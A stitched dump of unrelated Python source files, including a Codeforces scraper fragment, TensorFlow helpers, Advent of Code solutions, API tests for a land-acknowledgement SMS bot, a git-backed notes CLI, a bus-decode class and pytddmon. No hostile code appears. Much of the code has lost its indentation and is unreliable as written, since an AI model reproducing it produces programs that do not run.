solution = None
if len(text)==0:
failed_to_download = solution_id
else:
body = BeautifulSoup(str(text[0]), "html.parser").get_text()
body = body.replace("\\","\\\\")
solution = body.encode('utf-8').decode('string-escape')
return solution_id, solution, failed_to_download
def download_all_challenge_names(filename):
target = open(filename, 'w')
problem_list = []
for i in range(0,30):
a = 'http://codeforces.com/problemset/page/' + str(i+1)
l = get_problem_list(a)
for jdx, j in enumerate(l):
if jdx % 2 == 0:
problem_list.append(j)
    target.write(str(problem_list))
def download_descriptions_solutions(filename, index_n):
root_dir = 'codeforces_data'
file = open(filename, 'r')
f = open(filename, 'r')
index_n_int = int(index_n)
start = index_n_int + (600*index_n_int)
end = start + 599
all_names = []
for line in f:
raw = eval(str(line))
a = ""
b = ""
all_names = raw
    language = ["python", "c++"]
    failed_to_download = []
    for idx, i in enumerate(all_names):
        descriptions, left_out, failed_to_download_d = get_description(i)
        failed_to_download += failed_to_download_d
if i not in left_out:
if not os.path.exists(root_dir):
os.makedirs(root_dir)
save_dir = root_dir + "/" + i[0] + "_" + i[1]
#'''
if not os.path.exists(save_dir):
os.makedirs(save_dir)
description_dir = save_dir + "/description"
if not os.path.exists(description_dir):
os.makedirs(description_dir)
description_file_path = description_dir + "/description.txt"
description_file = open(description_file_path, 'w')
description_file.write(descriptions[0])
ids_l = []
for l in language:
ids = get_solution_ids(i, l)
ids_l.append(ids)
solutions = get_solutions(i, ids)
solution_dir = save_dir + "/solutions_" + l
if not os.path.exists(solution_dir):
os.makedirs(solution_dir)
for jdx, j in enumerate(solutions):
if len(solutions[j]) < 10000:
solution_file_path = solution_dir + "/" + j + ".txt"
solution_file = open(solution_file_path, 'w')
solution_file.write(solutions[j])
if len(ids_l[0]) == 0 and len(ids_l[1]) == 0:
shutil.rmtree(save_dir)
print("Finished download process")
if len(failed_to_download) > 0:
print("Following challenges failed to download: " + str(failed_to_download))
parser = argparse.ArgumentParser()
parser.add_argument('--index', type=str, default="1", help='')
args = parser.parse_args()
index_n = args.index
'''
download_all_challenge_names('challenges_all.txt')
#'''
#'''
download_descriptions_solutions('challenges_all.txt', index_n)
#'''
```
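`sub_strip` is passed to `re.sub` as a callback so the thin spaces (U+2009) are removed only inside the matched exponent span; an isolated demonstration of that callback pattern (the sample string is invented):
```python
import re
def sub_strip(matchobj):
    # drop thin spaces, but only inside the matched span
    return matchobj.group(0).replace(u"\u2009", "")
html = u'n \u2264 10<sup class="upper-index">\u2009-\u20099</sup>'
print(re.sub('class="upper-index">(.+?)</sup>', sub_strip, html, flags=re.S))
# -> n ≤ 10<sup class="upper-index">-9</sup>
```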
#### File: 0bserver07/neural-engineers-first-attempt/utils.py
```python
import numpy as np
import tensorflow as tf
from tensorflow.python.framework import ops
from tensorflow.python.ops import nn_ops, math_ops
def get_seq_length(sequence):
used = tf.sign(tf.reduce_max(tf.abs(sequence), reduction_indices=2))
length = tf.reduce_sum(used, reduction_indices=1)
length = tf.cast(length, tf.int32)
return length
def get_target_length(sequence):
used = tf.sign(sequence)
length = tf.reduce_sum(tf.to_float(used), reduction_indices=1)
return length
'''alrojo'''
def sequence_loss_tensor(logits, targets, weights, num_classes,
average_across_timesteps=True,
softmax_loss_function=None, name=None):
"""Weighted cross-entropy loss for a sequence of logits (per example).
    faster?; takes a 3D logits tensor, flattens and multiplies in one op, so no for loop
"""
with ops.name_scope(name, "sequence_loss_by_example", [logits, targets, weights]):
probs_flat = tf.reshape(logits, [-1, num_classes])
targets = tf.reshape(targets, [-1])
if softmax_loss_function is None:
crossent = nn_ops.sparse_softmax_cross_entropy_with_logits(
probs_flat, targets)
else:
crossent = softmax_loss_function(probs_flat, targets)
crossent = crossent * tf.reshape(weights, [-1])
crossent = tf.reduce_sum(crossent)
total_size = math_ops.reduce_sum(weights)
total_size += 1e-12 # to avoid division by zero
crossent /= total_size
return crossent
def _add_gradient_noise(t, stddev=1e-3, name=None):
"""Adds gradient noise as described in http://arxiv.org/abs/1511.06807
The input Tensor `t` should be a gradient.
The output will be `t` + gaussian noise.
0.001 was said to be a good fixed value for memory networks."""
with tf.op_scope([t, stddev], name, "add_gradient_noise") as name:
t = tf.convert_to_tensor(t, name="t")
gn = tf.random_normal(tf.shape(t), stddev=stddev)
return tf.add(t, gn, name=name)
# from https://github.com/domluna/memn2n
def _position_encoding(sentence_size, embedding_size):
"""Position encoding described in section 4.1 in "End to End Memory Networks" (http://arxiv.org/pdf/1503.08895v5.pdf)"""
encoding = np.ones((embedding_size, sentence_size), dtype=np.float32)
ls = sentence_size + 1
le = embedding_size + 1
for i in range(1, le):
for j in range(1, ls):
encoding[i - 1, j - 1] = (i - (le - 1) / 2) * (j - (ls - 1) / 2)
encoding = 1 + 4 * encoding / embedding_size / sentence_size
return np.transpose(encoding)
# TODO fix positional encoding so that it varies according to sentence lengths
def _xavier_weight_init():
"""Xavier initializer for all variables except embeddings as desribed in [1]"""
def _xavier_initializer(shape, **kwargs):
eps = np.sqrt(6) / np.sqrt(np.sum(shape))
out = tf.random_uniform(shape, minval=-eps, maxval=eps)
return out
return _xavier_initializer
# from https://danijar.com/variable-sequence-lengths-in-tensorflow/
# used only for custom attention GRU as TF handles this with the sequence length param for normal RNNs
def _last_relevant(output, length):
"""Finds the output at the end of each input"""
batch_size = int(output.get_shape()[0])
max_length = int(output.get_shape()[1])
out_size = int(output.get_shape()[2])
index = tf.range(0, batch_size) * max_length + (length - 1)
flat = tf.reshape(output, [-1, out_size])
relevant = tf.gather(flat, index)
return relevant
# from therne_utils
def _get_dims(shape):
fan_in = shape[0] if len(shape) == 2 else np.prod(shape[:-1])
fan_out = shape[1] if len(shape) == 2 else shape[-1]
return fan_in, fan_out
# from therne_utils
def batch_norm(x, is_training):
""" Batch normalization.
:param x: Tensor
:param is_training: boolean tf.Variable, true indicates training phase
:return: batch-normalized tensor
"""
with tf.variable_scope('BatchNorm'):
# calculate dimensions (from tf.contrib.layers.batch_norm)
inputs_shape = x.get_shape()
axis = list(range(len(inputs_shape) - 1))
param_shape = inputs_shape[-1:]
beta = tf.get_variable('beta', param_shape, initializer=tf.constant_initializer(0.))
gamma = tf.get_variable('gamma', param_shape, initializer=tf.constant_initializer(1.))
batch_mean, batch_var = tf.nn.moments(x, axis)
ema = tf.train.ExponentialMovingAverage(decay=0.5)
def mean_var_with_update():
ema_apply_op = ema.apply([batch_mean, batch_var])
with tf.control_dependencies([ema_apply_op]):
return tf.identity(batch_mean), tf.identity(batch_var)
mean, var = tf.cond(is_training,
mean_var_with_update,
lambda: (ema.average(batch_mean), ema.average(batch_var)))
normed = tf.nn.batch_normalization(x, mean, var, beta, gamma, 1e-3)
return normed
```
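The masking trick in `get_seq_length` (sign of the per-step max absolute feature marks non-padding steps) is easiest to see in plain numpy; a small sketch with an invented batch:
```python
import numpy as np
# batch of 2 sequences, max length 4, feature size 3; all-zero steps are padding
batch = np.zeros((2, 4, 3), dtype=np.float32)
batch[0, :2] = 1.0   # first sequence really has 2 steps
batch[1, :3] = 0.5   # second sequence really has 3 steps
used = np.sign(np.abs(batch).max(axis=2))   # 1.0 wherever a step carries any signal
lengths = used.sum(axis=1).astype(np.int32)
print(lengths)   # [2 3]
```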
{
"source": "0Bu/advent-of-code-2018",
"score": 3
} |
#### File: 0Bu/advent-of-code-2018/day03.py
```python
import re
def get_overlapping_claims(rectangles):
coordinates = {}
for r in rectangles:
index, x, y, width, height = [int(a) for a in re.findall(r'\d+', r)]
for y_ in range(y, y + height):
for x_ in range(x, x + width):
if (x_, y_) in coordinates:
coordinates[(x_, y_)] += 1
else:
coordinates[(x_, y_)] = 1
return sum(v > 1 for v in coordinates.values())
def get_nonoverlapping_claim_ids(rectangles):
coordinates = dict()
ids = set()
for r in rectangles:
index, x, y, width, height = [int(a) for a in re.findall(r'\d+', r)]
ids.add(index)
for y_ in range(y, y + height):
for x_ in range(x, x + width):
coordinates.setdefault((x_, y_), set()).add(index)
for c in coordinates.values():
if len(c) > 1:
ids -= c
return ids
if __name__ == "__main__":
lines = [line.strip() for line in open("day03.txt", "r")]
print('overlapped claims:', get_overlapping_claims(lines[:]))
print('nonoverlapping claim ids:', get_nonoverlapping_claim_ids(lines[:]))
```
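A hypothetical test for `day03` in the same style as the repo's `test_day01.py`, using the worked example from the day 3 puzzle statement (assumes `day03` is importable):
```python
import unittest
import day03
CLAIMS = ["#1 @ 1,3: 4x4", "#2 @ 3,1: 4x4", "#3 @ 5,5: 2x2"]
class Part1(unittest.TestCase):
    def test_get_overlapping_claims(self):
        self.assertEqual(day03.get_overlapping_claims(CLAIMS), 4)
class Part2(unittest.TestCase):
    def test_get_nonoverlapping_claim_ids(self):
        self.assertEqual(day03.get_nonoverlapping_claim_ids(CLAIMS), {3})
```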
#### File: advent-of-code-2018/test/test_day01.py
```python
import unittest
import day01
class Part1(unittest.TestCase):
def test_get_frequency(self):
self.assertEqual(day01.get_frequency([+1, +1, +1]), 3)
self.assertEqual(day01.get_frequency([+1, +1, -2]), 0)
self.assertEqual(day01.get_frequency([-1, -2, -3]), -6)
class Part2(unittest.TestCase):
def test_get_dejavu(self):
self.assertEqual(day01.get_dejavu([+1, -1]), 0)
self.assertEqual(day01.get_dejavu([+3, +3, +4, -2, -4]), 10)
self.assertEqual(day01.get_dejavu([-6, +3, +8, +5, -6]), 5)
self.assertEqual(day01.get_dejavu([+7, +7, -2, -7, -4]), 14)
```
{
"source": "0c370t/land_acknowledgement",
"score": 3
} |
#### File: src/tests/test_api.py
```python
from unittest.mock import patch
import pytest
from falcon import testing
from app.web import create_app
from xml.dom import minidom
def get_message_from_xml(xml_string):
'''Just a little help to deal with twilio's xml format'''
xmldoc = minidom.parseString(xml_string)
itemlist = xmldoc.getElementsByTagName('Message')
return itemlist[0].firstChild.data
@pytest.fixture()
def client():
return testing.TestClient(create_app())
@patch('app.web.GeoData.query_location')
def test_unknown_location(query_location, client):
'''It should respond with help text when location can't be found'''
query_location.return_value = None
result = client.simulate_post('/', params={'Body': "Sometown, ak"})
assert get_message_from_xml(result.text) == 'I could not find the location: Sometown, ak'
@patch('app.web.GeoData.query_location')
@patch('app.web.GeoData.native_land_from_point')
def test_unfound_acknowledgement(from_point, query_location, client):
'''It should respond with help text when there's no native land for a point'''
query_location.return_value = {'city': 'Paris', 'state': 'France', 'latitude': 45.928, 'longitude': -67.56}
from_point.return_value = []
result = client.simulate_post('/', params={'Body': "Paris, France"})
assert get_message_from_xml(result.text) == 'Sorry, I could not find anything about Paris, France.'
@patch('app.web.GeoData.query_location')
@patch('app.web.GeoData.native_land_from_point')
def test_single_result(from_point, query_location, client):
'''It should respond with a single result when there's only one'''
query_location.return_value = {'city': 'Adacao', 'state': 'Guam', 'latitude': 45.928, 'longitude': -67.56}
from_point.return_value = [{'name': 'Chamorro'}]
result = client.simulate_post('/', params={'Body': "Adacao, gu"})
assert get_message_from_xml(result.text) == 'In Adacao, Guam you are on Chamorro land.'
@patch('app.web.GeoData.query_location')
@patch('app.web.GeoData.native_land_from_point')
def test_two_results(from_point, query_location, client):
'''It should respond with a two results when there's two results'''
query_location.return_value = {'city': 'Portland', 'state': 'Oregon', 'latitude': 45.928, 'longitude': -67.56}
from_point.return_value = [{'name': 'Cowlitz'}, {'name': 'Clackamas'}]
result = client.simulate_post('/', params={'Body': "Portland, or"})
assert get_message_from_xml(result.text) == 'In Portland, Oregon you are on Cowlitz and Clackamas land.'
@patch('app.web.GeoData.query_location')
@patch('app.web.GeoData.native_land_from_point')
def test_multiple_results(from_point, query_location, client):
'''It prefers the Oxford comma'''
query_location.return_value = {'city': 'Seattle', 'state': 'Washington', 'latitude': 45.928, 'longitude': -67.56}
from_point.return_value = [{'name': 'Duwamish'}, {'name': 'Coast Salish'}, {'name': 'Suquamish'}]
result = client.simulate_post('/', params={'Body': "Seattle, wa"})
assert get_message_from_xml(result.text) == 'In Seattle, Washington you are on Duwamish, Coast Salish, and Suquamish land.' # noqa E501
```
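The `get_message_from_xml` helper just pulls the SMS text back out of the TwiML `<Message>` element; a stand-alone illustration of that parsing (the XML string is invented):
```python
from xml.dom import minidom
twiml = '<?xml version="1.0" encoding="UTF-8"?><Response><Message>Hello</Message></Response>'
doc = minidom.parseString(twiml)
print(doc.getElementsByTagName('Message')[0].firstChild.data)   # Hello
```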
{
"source": "0c4t/zetta",
"score": 3
} |
#### File: zetta/zetta/zetta.py
```python
import os
import sys
import datetime
import argparse
import shutil
from subprocess import call
from git import Repo
from git import GitCommandError
from git import InvalidGitRepositoryError
def parse_args():
parser = argparse.ArgumentParser(
description="A Tool for managing a \"box of notes\"")
subparsers = parser.add_subparsers(dest="action")
search_parser = subparsers.add_parser("search",
help="search through notes")
search_parser.add_argument("pattern", type=str,
help="pattern to search in notes for")
edit_parser = subparsers.add_parser("edit",
help="edit note by id")
edit_parser.add_argument("id",
help="note id")
create_parser = subparsers.add_parser("create",
help="create new note")
create_parser.add_argument("-t", "--title", type=str,
default="# ", dest="title", help="desired title")
delete_parser = subparsers.add_parser("delete",
help="delete note by id")
delete_parser.add_argument("id",
help="note id")
return parser.parse_args()
def main():
args = parse_args()
try:
global PATH_TO_REPO
PATH_TO_REPO = os.environ["ZETTA_BOX"]
except KeyError as e:
sys.stderr.write("Error: please set ZETTA_BOX environment variable\nto path to git repo to store notes in!\n\n")
return -1
if not (os.path.exists(PATH_TO_REPO) and os.path.isdir(PATH_TO_REPO)):
sys.stderr.write("Error: path to repo is invalid!\n\n")
return -1
global REPO
try:
REPO = Repo(PATH_TO_REPO)
except InvalidGitRepositoryError as e:
sys.stderr.write("Error: path in ZETTA_BOX is a valid path to dir, but there isn't a git repo in it\n\n")
return -1
actions = {
"search": search,
"edit": edit,
"create": create,
"delete": delete
}
if args.action in actions.keys():
action = actions[args.action]
if callable(action):
action(args)
def search(args):
pattern_lower = args.pattern.lower()
# only note directories (timestamp names); skips .git and any other entries
notes = [name for name in os.listdir(PATH_TO_REPO) if name.isnumeric()]
for note_name in notes:
path = f'{PATH_TO_REPO}{os.path.sep}{note_name}'
path_to_note_file = f"{path}/README.md"
with open(path_to_note_file, 'r') as note_file:
title = note_file.readline()
if "\n" in title:
title = title[:-1]
if "#" in title:
title = title[1:]
title = title.strip()
note_file.seek(0)
while True:
line = note_file.readline()
line = line.lower()
if not line:
break
if pattern_lower in line:
print(note_name + ": " + title)
break
def edit(args):
note_name = args.id
if not note_name.isnumeric():
sys.stderr.write("\nError: note id should be numeric\n\n")
return -1
editor = os.environ.get("EDITOR") if os.environ.get("EDITOR") else "vi"
path = f'{PATH_TO_REPO}{os.path.sep}{note_name}'
path_to_note_file = f"{path}/README.md"
call([editor, path_to_note_file])
with open(path_to_note_file, "r") as note_file:
commit_message = note_name + ": " + note_file.readline()
commit = input("commit? (y/n): ")
while (commit != "y") and (commit != "n"):
commit = input("enter either \"y\" or \"n\": ")
if (commit == "y"):
git = REPO.git
git.add(path_to_note_file)
try:
git.commit(m=commit_message)
except GitCommandError as e:
print("Nothing to commit :(\n")
def create(args):
title = str(args.title)
editor = os.environ.get("EDITOR") if os.environ.get("EDITOR") else "vi"
note_name = datetime.datetime.now().strftime("%Y%m%d%H%M%S")
path = f'{PATH_TO_REPO}{os.path.sep}{note_name}'
os.mkdir(path)
path_to_note_file = f"{path}/README.md"
with open(path_to_note_file, "w") as note_file:
note_file.write(title)
note_file.flush()
call([editor, path_to_note_file])
note_file = open(path_to_note_file, "r")
commit_message = note_name + ": " + note_file.readline()
print(note_name)
commit = input("commit? (y/n): ")
while (commit != "y") and (commit != "n"):
commit = input("enter either \"y\" or \"n\": ")
if (commit == "y"):
git = REPO.git
git.add(path_to_note_file)
git.commit(m=commit_message)
def delete(args):
note_name = args.id
path = f'{PATH_TO_REPO}{os.path.sep}{note_name}'
path_to_note_file = f"{path}/README.md"
try:
with open(path_to_note_file, "r") as note_file:
note_title = note_file.readline()
except FileNotFoundError as e:
sys.stderr.write("\nError: note with given name does not exist :(\n\n")
return
do_deletion = input(f"{note_name}: {note_title}\ndelete? (y/n): ")
if (do_deletion != "y"):
print("deletion canceled!")
return
shutil.rmtree(path)
commit_message = "deleted " + note_name
print(f"deleted {note_name} ({note_title})")
commit = input("commit? (y/n): ")
while (commit != "y") and (commit != "n"):
commit = input("enter either \"y\" or \"n\": ")
if (commit == "y"):
try:
git = REPO.git
git.add(path_to_note_file)
git.commit(m=commit_message)
except GitCommandError as e:
sys.stderr.write("\nWarning: could not commit note deletion (was not committed on creation?)\n\n")
if __name__ == "__main__":
exit(main())
``` |
{
"source": "0caliber/tds3012b",
"score": 2
} |
#### File: 0caliber/tds3012b/BusDecode.py
```python
import unittest
###############################################################################################
# Main Bus Class Decode Functions
###############################################################################################
class BusDecode:
def __init__(self):
print('Bus Decode')
self.LevelLo = 0.7
self.LevelHi = 2.7
self.EdgeDuration = 0 # used to determine sample scale for edge detection
self.PulseDurationLo = 0
self.PulseDurationHi = 0
self.bitlen = 1
# Comm defaults
def f_Threshold(self, rawdata):
dataout = []
for mydata in rawdata:
if mydata >= self.LevelHi:
mydigit = 1
elif mydata <= self.LevelLo:
mydigit = 0
else:
mydigit = 2
dataout.append(mydigit)
return dataout
pass
def f_FindClkDuration(self, thrdata):
low = 0
hi = 0
lowmax = 0
himax = 0
state = 0
for mydata in thrdata:
if mydata == 0:
low += 1
lowmax = max(lowmax, low)
elif mydata == 1:
hi += 1
himax = max(himax, hi)
if state == 0:
if mydata == 1:
low = 0
state = 1
elif state == 1:
if mydata == 0:
hi = 0
state = 0
self.PulseDurationLo = lowmax
self.PulseDurationHi = himax
pass
def f_FindEdges(self, thrdata):
state = 0
cnt = 0
dataout = []
newdigit = 0
mydigit = 0
for mydata in thrdata:
if state == 0:
if mydata == 1:
mydigit = 1
state = 1
elif mydata == 0:
mydigit = 0
state = 0
else: # mydata == 2:
state = 2
mydigit = 0
newdigit = 1
elif state == 1:
if mydata == 1:
mydigit = 0
state = 1
elif mydata == 0:
mydigit = -1
state = 0
else: # mydata == 2:
state = 2
mydigit = 0
newdigit = -1
else:
if mydata == 1:
mydigit = newdigit
state = 1
cnt = 0
elif mydata == 0:
mydigit = newdigit
state = 0
cnt = 0
else:
mydigit = 0
pass
dataout.append(mydigit)
return dataout
pass
def f_DecodeData(self, rawdata):
pass
def f_SetThresholdHi(self, LevelHi):
self.LevelHi = LevelHi
pass
def f_SetThresholdLo(self, LevelLo):
self.LevelLo = LevelLo
pass
def f_SetThresholdType(self, std_type):
try:
(self.LevelLo, self.LevelHi) = {
"CMOS" : (1.5, 3.5),
"LVCMOS" : (1, 2.3),
"TTL" : (0.7, 2.4),
"LVTTL" : (0.3, 2),
"RS422U" : (1.7, 2.5)
}[std_type]
except:
print ('Unknown standard, ', std_type)
def f_SetEdgeTimeSamples(self, edgesamples):
self.EdgeDuration = edgesamples
###############################################################################################
# TDD Unit Test Class and functions
###############################################################################################
class test_basic(unittest.TestCase):
# Test Attribute control
def test_ThesholdTypeCMOSHi(self):
x=BusDecode()
x.f_SetThresholdType('CMOS')
self.assertEqual(3.5, x.LevelHi)
def test_ThesholdTypeCMOSLo(self):
x=BusDecode()
x.f_SetThresholdType('CMOS')
self.assertEqual(1.5, x.LevelLo)
def test_ThesholdTypeLVCMOSHi(self):
x=BusDecode()
x.f_SetThresholdType('LVCMOS')
self.assertEqual(2.3, x.LevelHi)
def test_ThesholdTypeLVCMOSLo(self):
x=BusDecode()
x.f_SetThresholdType('LVCMOS')
self.assertEqual(1, x.LevelLo)
def test_ThesholdTypeTTLHi(self):
x=BusDecode()
x.f_SetThresholdType('TTL')
self.assertEqual(2.4, x.LevelHi)
def test_ThesholdTypeTTLLo(self):
x=BusDecode()
x.f_SetThresholdType('TTL')
self.assertEqual(0.7, x.LevelLo)
def test_ThesholdTypeLVTTLHi(self):
x=BusDecode()
x.f_SetThresholdType('LVTTL')
self.assertEqual(2, x.LevelHi)
def test_ThesholdTypeLVTTLLo(self):
x=BusDecode()
x.f_SetThresholdType('LVTTL')
self.assertEqual(0.3, x.LevelLo)
def test_SetThresholdHi(self):
x=BusDecode()
x.f_SetThresholdHi(1.2)
self.assertEqual(1.2, x.LevelHi)
def test_SetThresholdLo(self):
x=BusDecode()
x.f_SetThresholdLo(1)
self.assertEqual(1, x.LevelLo)
def test_SetEdgeTimeSamples(self):
x=BusDecode()
x.f_SetEdgeTimeSamples(1)
self.assertEqual(1, x.EdgeDuration)
# Test Threshold to Logic Function of RAW data
def test_ThresholdLVCMOS(self):
datain = [0.2, 0.2, 0.3, 0.7, 0.9, 1.0, 1.2, 1.3, 1.7, 1.9, 2.2, 2.7, 2.8, 2.8, 2.8 ]
x=BusDecode()
x.f_SetThresholdType('LVCMOS')
dataout = x.f_Threshold(datain)
dataref = [0, 0, 0, 0, 0, 0, 2, 2, 2, 2, 2, 1, 1, 1, 1 ]
self.assertEqual(dataref, dataout)
def test_ThresholdLVTTL(self):
datain = [0.2, 0.2, 0.3, 0.7, 0.9, 1.0, 1.2, 1.3, 1.7, 1.9, 2.2, 2.7, 2.8, 2.8, 2.8 ]
x=BusDecode()
x.f_SetThresholdType('LVTTL')
dataout = x.f_Threshold(datain)
dataref = [0, 0, 0, 2, 2, 2, 2, 2, 2, 2, 1, 1, 1, 1, 1 ]
self.assertEqual(dataref, dataout)
# Test Clock Frequency determination
def test_FindClockFreq(self):
datain = [0.2, 2.4, 0.2, 2.4, 0.2, 1.5, 2.4, 2.4, 1.5, 0.2, 0.2, 1.7, 2.4, 1.2, 0.2, 2.4, 0.2, 2.4, 0.2]
x=BusDecode()
x.f_SetThresholdType('LVTTL')
dataout = x.f_Threshold(datain)
x.f_FindClkDuration(dataout)
self.assertEqual(2, x.PulseDurationLo)
self.assertEqual(2, x.PulseDurationHi)
# Test Digital Word Determination
def test_FindEdges(self):
datain = [0.2, 2.4, 0.2, 2.4, 0.2, 1.5, 2.4, 2.4, 1.5, 0.2, 0.2, 1.7, 2.4, 1.2, 0.2, 2.4, 0.2, 2.4, 0.2]
x=BusDecode()
x.f_SetThresholdType('LVTTL')
x.f_SetEdgeTimeSamples(0)
dataout = x.f_Threshold(datain)
digital = x.f_FindEdges(dataout)
digitalref = [0, 1, -1, 1, -1, 0, 1, 0, 0, -1, 0, 0, 1, 0, -1, 1,-1, 1, -1 ]
self.assertEqual(digitalref, digital)
```
#### File: 0caliber/tds3012b/pytddmon.py
```python
import os
import sys
import tempfile
import atexit
import shlex
import platform
import optparse
import re
from time import gmtime, strftime
from subprocess import Popen, PIPE, STDOUT
ON_PYTHON3 = sys.version_info[0] == 3
ON_WINDOWS = platform.system() == "Windows"
if not ON_PYTHON3:
import Tkinter as tk
else:
import tkinter as tk
# Constants
TEMP_FILE_DIR_NAME = tempfile.mkdtemp()
RUN_TESTS_SCRIPT_FILE = os.path.join(TEMP_FILE_DIR_NAME, 'pytddmon_tmp.py')
TEMP_OUT_FILE_NAME = os.path.join(TEMP_FILE_DIR_NAME, "out")
# If pytddmon is run in test mode, it will:
# 1. display the GUI for a very short time
# 2. write a log file, containing the information displayed
# (most notably green/total)
# 3. exit
TEST_MODE_FLAG = '--log-and-exit'
TEST_MODE_LOG_FILE = 'pytddmon.log'
TEST_FILE_REGEXP = "test_.*\\.py"
PYTHON_FILE_REGEXP = ".*\\.py"
def re_complete_match(regexp, string_to_match):
"""Helper function that checks whether the full string_to_match
matches the regexp"""
return bool(re.match(regexp+"$", string_to_match))
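# Small illustration of the helper above, using the constants defined in this module:
#   re_complete_match(TEST_FILE_REGEXP, "test_foo.py")   -> True
#   re_complete_match(TEST_FILE_REGEXP, "mytest_foo.py") -> False  (the whole name must match)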
# End of Constants
def file_name_to_module(base_path, file_name):
r"""Converts filenames of files in packages to import friendly dot separated
paths.
Examples:
>>> print(file_name_to_module("","pytddmon.pyw"))
pytddmon
>>> print(file_name_to_module("","pytddmon.py"))
pytddmon
>>> print(file_name_to_module("","tests/pytddmon.py"))
tests.pytddmon
>>> print(file_name_to_module("","./tests/pytddmon.py"))
tests.pytddmon
>>> print(file_name_to_module("",".\\tests\\pytddmon.py"))
tests.pytddmon
>>> print(file_name_to_module("/User/pytddmon\\ geek/pytddmon/","/User/pytddmon\\ geek/pytddmon/tests/pytddmon.py"))
tests.pytddmon
"""
symbol_stripped = os.path.relpath(file_name, base_path)
for symbol in r"/\.":
symbol_stripped = symbol_stripped.replace(symbol, " ")
words = symbol_stripped.split()
module_words = words[:-1] # remove .py/.pyw
module_name = '.'.join(module_words)
return module_name
def build_run_script(files):
"""Compiles a script to run all tests in the files.
>>> print(build_run_script(["pytddmon.py"]))
import sys
import unittest
import doctest
...
import pytddmon
suite.addTests(load_module_tests(pytddmon))
try:
suite.addTests(doctest.DocTestSuite(pytddmon, optionflags=doctest.ELLIPSIS))
except:pass
...
"""
content = []
content.append("import sys")
content.append("import unittest")
content.append("import doctest")
content.append("")
content.append("sys.path[0] = %r" % os.getcwd())
content.append("suite = unittest.TestSuite()")
content.append(
"load_module_tests = unittest.defaultTestLoader.loadTestsFromModule"
)
content.append("")
for filename in files:
module = file_name_to_module("", filename)
content.append('import ' + module)
content.append('suite.addTests(load_module_tests(' + module + '))')
content.append('try:')
content.append(
' suite.addTests(doctest.DocTestSuite(' +
module +
', optionflags=doctest.ELLIPSIS))'
)
content.append('except:pass')
content.append('')
content.append("if __name__ == '__main__':")
content.append(" out = open(%r, 'w')" % TEMP_OUT_FILE_NAME)
content.append(" unittest.TextTestRunner(stream=out).run(suite)")
return "\n".join(content)
def calculate_checksum(filelist, fileinfo):
"""Generates a checksum for all the files in the file list."""
val = 0
for filename in filelist:
val += (
fileinfo.get_modified_time(filename) +
fileinfo.get_size(filename) +
fileinfo.get_name_hash(filename)
)
return val
class ColorPicker:
"""
ColorPicker decides the background color of the pytddmon window,
based on the number of green tests and the total number of
tests. There is also a "pulse" (light color, dark color)
to increase the feeling of continuous testing.
"""
def __init__(self):
self.color = 'green'
self.light = True
def pick(self):
"returns the tuple (light, color) with the types (bool, str)"
return (self.light, self.color)
def pulse(self):
"updates the light state"
self.light = not self.light
def reset_pulse(self):
"resets the light state"
self.light = True
def set_result(self, green, total):
"calculates what color should be used and may reset the lightness"
old_color = self.color
self.color = 'green'
if green == total-1:
self.color = 'red'
if green < total-1:
self.color = 'gray'
if self.color != old_color:
self.reset_pulse()
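# A minimal usage sketch of ColorPicker (illustrative only, not part of pytddmon's flow):
#   picker = ColorPicker()
#   picker.set_result(green=3, total=5)  # more than one failing test -> 'gray'
#   picker.pick()                        # (True, 'gray') right after a color change
#   picker.pulse()                       # toggles light/dark for the next repaint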
def win_text(total_tests, passing_tests=0):
"""
The text shown in the main window.
"""
return "%d/%d" % (passing_tests, total_tests)
class ScriptWriter:
"""
ScriptWriter: gets its modules from the Finder, and
writes a test script using the file writer and script
builder.
"""
def __init__(self, finder, file_writer, script_builder):
self.finder = finder
self.file_writer = file_writer
self.script_builder = script_builder
def write_script(self):
"""
Finds the tests, compiles the test runner script, and writes it
to file. This is done with the help of the finder, script builder, and
file writer.
"""
modules = self.finder()
result = self.script_builder(modules)
self.file_writer(RUN_TESTS_SCRIPT_FILE, result)
class TestScriptRunner:
"""
TestScriptRunner has two collaborators:
cmdrunner, runs a specified command line, returns stderr as string
analyzer, analyses unittest-output into green,total number of tests
"""
def __init__(self, cmdrunner, analyzer):
self.cmdrunner = cmdrunner
self.analyzer = analyzer
def run(self, test_script):
"""
Runs the test runner script and returns the analysed output.
"""
output = self.cmdrunner('python "%s"' % test_script)
return self.analyzer.analyze(output)
class Analyzer:
"""
Analyzer
Analyzes unittest output to find green and total number of tests.
Collaborators: logger, log messages a written to the log
"""
def __init__(self, logger):
self.logger = logger
def analyze(self, txt):
"""
Analyses the output from a unittest run and returns a tuple of
(passed/green, total)
"""
if len(txt.strip()) == 0:
return (0, 0)
toprow = txt.splitlines()[0]
green = toprow.count('.')
total = len(toprow)
if green < total:
self.logger.log(txt)
return (green, total)
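# Hedged example of what analyze() returns for typical unittest output
# (Logger is defined just below):
#   Analyzer(Logger()).analyze("..F.\n...")  -> (3, 4)  # 3 dots on the top row, 4 chars total
#   Analyzer(Logger()).analyze("")           -> (0, 0)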
class Logger:
"""
Logger, remembers log messages.
"""
def __init__(self):
self.complete_log = ""
def log(self, message):
"""
Adds message to the log
"""
self.complete_log = self.complete_log + message
def get_log(self):
"""
returns the log as a string
"""
return self.complete_log
def clear(self):
"""
clears all entries in the log
"""
self.complete_log = ""
## Rows above this are unit-tested.
## Rows below this are not unit-tested.
def remove_tmp_files():
"""
Clean up all tempfiles after us.
"""
safe_remove(RUN_TESTS_SCRIPT_FILE)
if os.path.exists(TEMP_FILE_DIR_NAME):
os.removedirs(TEMP_FILE_DIR_NAME)
atexit.register(remove_tmp_files)
class RealFileInfo(object):
"""
An adapter to easily look up info about a file.
"""
@staticmethod
def get_size(filename):
"returns the size of a file"
return os.stat(filename).st_size
@staticmethod
def get_modified_time(filename):
"returns the time the file was last modified"
return os.stat(filename).st_mtime
@staticmethod
def get_name_hash(path):
"""
returns a hash of the name of the path
"""
return hash(path)
def find_monitored_files():
" Finds all python modules in current directory and subdirectories "
monitored_files = []
for path, _folders, files in os.walk("."):
for filename in files:
if re_complete_match(PYTHON_FILE_REGEXP, filename):
monitored_file = os.path.join(path, filename)
monitored_files.append(monitored_file)
return monitored_files
def find_test_files_recursively():
"""
Scan recursively for unit test files in current folder
and in folders which are packages. Packages are assumed
to contain the word 'test'. The same holds true for unit
test files, with the additional condition that they are
assumed to end with '.py'.
"""
test_files = []
for path, folders, files in os.walk("."):
for filename in files:
if re_complete_match(TEST_FILE_REGEXP, filename):
test_file = os.path.join(path, filename)
test_files.append(test_file)
folders[:] = [
folder
for folder in folders
if os.path.isfile(
os.path.join(path, folder, "__init__.py")
)
]
return test_files
